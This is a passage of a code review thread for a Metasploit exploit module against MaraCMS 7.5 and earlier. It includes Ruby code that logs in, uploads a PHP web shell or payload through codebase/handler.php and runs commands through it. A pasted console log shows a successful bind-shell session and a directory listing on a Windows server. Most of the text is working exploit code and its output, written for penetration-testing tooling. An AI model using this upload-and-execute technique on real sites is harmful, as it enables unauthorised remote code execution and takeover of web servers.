modules/exploits/multi/http/maracms_upload_exec.rb

```diff
@@ -0,0 +1,319 @@
+    end
+
+    print_good('Successfully authenticated to MaraCMS')
+  end
+
+  def upload_payload
+    # set payload according to target platform
+    if target['Platform'] == 'php'
+      pl = payload.encoded
+    else
+      @shell_cmd_name = rand_text_alphanumeric(3..6)
+      pl = "system($_GET[\"#{@shell_cmd_name}\"]);"
+    end
+
+    @payload_name = rand_text_alphanumeric(8..12) << '.php'
+    one_base64 = Rex::Text.encode_base64('1') # used twice below
+
+    # generate post data
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(one_base64.to_s, nil, nil, 'form-data; name="authenticated"')
+    post_data.add_part(Rex::Text.encode_base64('upload').to_s, nil, nil, 'form-data; name="action"')
+    post_data.add_part('10485760', nil, nil, 'form-data; name="MAX_FILE_SIZE"')
+    post_data.add_part('filenew', nil, nil, 'form-data; name="type"')
+    post_data.add_part("<?php #{pl} ?>", 'application/x-php', nil, "form-data; name=\"files[]\"; filename=\"#{@payload_name}\"")
+    post_data.add_part(@username_base64.to_s, nil, nil, 'form-data; name="usr"')
+    post_data.add_part(@salted_hash_base64.to_s, nil, nil, 'form-data; name="pwd"')
+    post_data.add_part(one_base64.to_s, nil, nil, 'form-data; name="authenticated"')
+    post_data.add_part('/', nil, nil, 'form-data; name="destdir"')
+
+    print_status("Uploading payload as #{@payload_name}...")
+
+    # upload payload
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'codebase', 'handler.php'),
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'headers' => { 'Referer' => "#{ssl ? 'https' : 'http'}://#{peer}#{normalize_uri(target_uri.path, 'codebase', 'dir.php?type=filenew')}" },
+      'data' => post_data.to_s
+    })
+
+    unless res
+      fail_with(Failure::Disconnected, 'Connection failed while trying to upload the payload.')
+    end
+
+    unless res.code == 200 && res.body.include?("OK: #{@payload_name} uploaded.")
+      fail_with(Failure::Unknown, 'Failed to upload the payload.')
+    end
+
+    print_good("Successfully uploaded #{@payload_name}")
+  end
+
+  def execute_command(cmd, _opts = {})
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, @payload_name),
+      'vars_get' => { @shell_cmd_name => cmd }
+    })
+
+    unless res && res.code == 200
+      fail_with(Failure::Unknown, 'Failed to execute the payload.')
+    end
+
+  end
+
+  def on_new_session(cli)
+    if cli.type != 'meterpreter'
+      print_error("No automatic cleanup for you. Please manually remove: #{@payload_name}")
+      return
+    end
+    cli.core.use('stdapi') if !cli.ext.aliases.include?('stdapi')
+
+    begin
+      print_warning("Deleting: #{@payload_name}")
+      cli.fs.file.rm(@payload_name)
+      print_good("#{@payload_name} removed")
+    rescue StandardError
+      print_error("Unable to delete: #{@payload_name}")
+    end
+  end
```

Comment:
One last suggestion I would like to give, cleanup of uploaded files can be automatically [handled](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/file_dropper.rb#L52) by Framework. `on_new_session ` can be removed and replaced by one line you can add at the end of `upload_payload `, after the payload has been successfully uploaded:
```
  register_file_for_cleanup(@payload_name)
```
For this to work, you need to require the `FileDropper` mixin:
```
  include Msf::Exploit::FileDropper
```
One of the benefits of using automatic cleanup is the support of other session type than Meterpreter (e.g. shell).

Reply:
Thanks for the suggestion! I forgot about that option. I just added it, and while it works fine with meterpreter payloads for both targets, as well as with a reverse PHP shell, it didn't work for me with a Windows shell payload, so you may want to test it yourself before landing it.

Reply:
You're very welcome! I just tested against Windows Server 2016  with Apache and PHP 7.4.4 and it worked with both meterpreter and and shell payloads on Windows. I just noticed a warning after a few seconds (`[!] Tried to delete ibNEyFsG0.php, unknown result`), but it correctly deleted the file:
```
msf6 exploit(multi/http/maracms_upload_exec) > run

[*] Executing automatic check (disable AutoCheck to override)
[*] Running check
[+] The target appears to be vulnerable. Target is most likely MaraCMS with version 7.5 or lower
[*] Obtained salt `3950` from server. Using salt to authenticate...
[+] Successfully authenticated to MaraCMS
[*] Uploading payload as ibNEyFsG0.php...
[+] Successfully uploaded ibNEyFsG0.php
[*] Executing the payload...
[*] Started bind TCP handler against 1.2.3.4:4444
[-] The connection was refused by the remote host (1.2.3.4:4444).
[*] Command shell session 5 opened (0.0.0.0:0 -> 1.2.3.4:4444) at 2020-09-25 19:41:22 +0200
[!] Tried to delete ibNEyFsG0.php, unknown result

dir
 Volume in drive C has no label.
 Volume Serial Number is 6E9F-E6BF

 Directory of C:\Apache24\htdocs\maracms

09/25/2020  05:41 PM    <DIR>          .
09/25/2020  05:41 PM    <DIR>          ..
09/25/2020  03:43 PM             4,236 about.php
09/25/2020  03:43 PM    <DIR>          blog
09/25/2020  03:43 PM                 0 blog.cat
09/25/2020  03:43 PM               627 changes.txt
09/25/2020  03:43 PM    <DIR>          codebase
09/25/2020  03:43 PM             1,655 contact.php
09/25/2020  03:43 PM    <DIR>          css
09/25/2020  03:43 PM             1,445 example.htaccess
09/25/2020  03:43 PM             3,906 gallery.php
09/25/2020  03:43 PM    <DIR>          img
09/25/2020  03:43 PM             7,687 index.php
09/25/2020  04:16 PM    <DIR>          log
09/25/2020  03:43 PM            14,814 lorem.php
09/25/2020  03:43 PM    <DIR>          plugin
09/25/2020  03:43 PM    <DIR>          sitecfg
09/25/2020  03:43 PM             2,627 sitemap.php
09/25/2020  03:43 PM    <DIR>          template
09/25/2020  03:43 PM    <DIR>          theme
12/06/2018  08:33 PM    <DIR>          undo
               9 File(s)         36,997 bytes
              12 Dir(s)  10,894,569,472 bytes free
```

Reply:
Sounds good! I think I got that warning as well with a PHP reverse shell, and in that case it also deleted the payload, so not sure what's up with that, but that seems more of a framework issue than an issue in the module.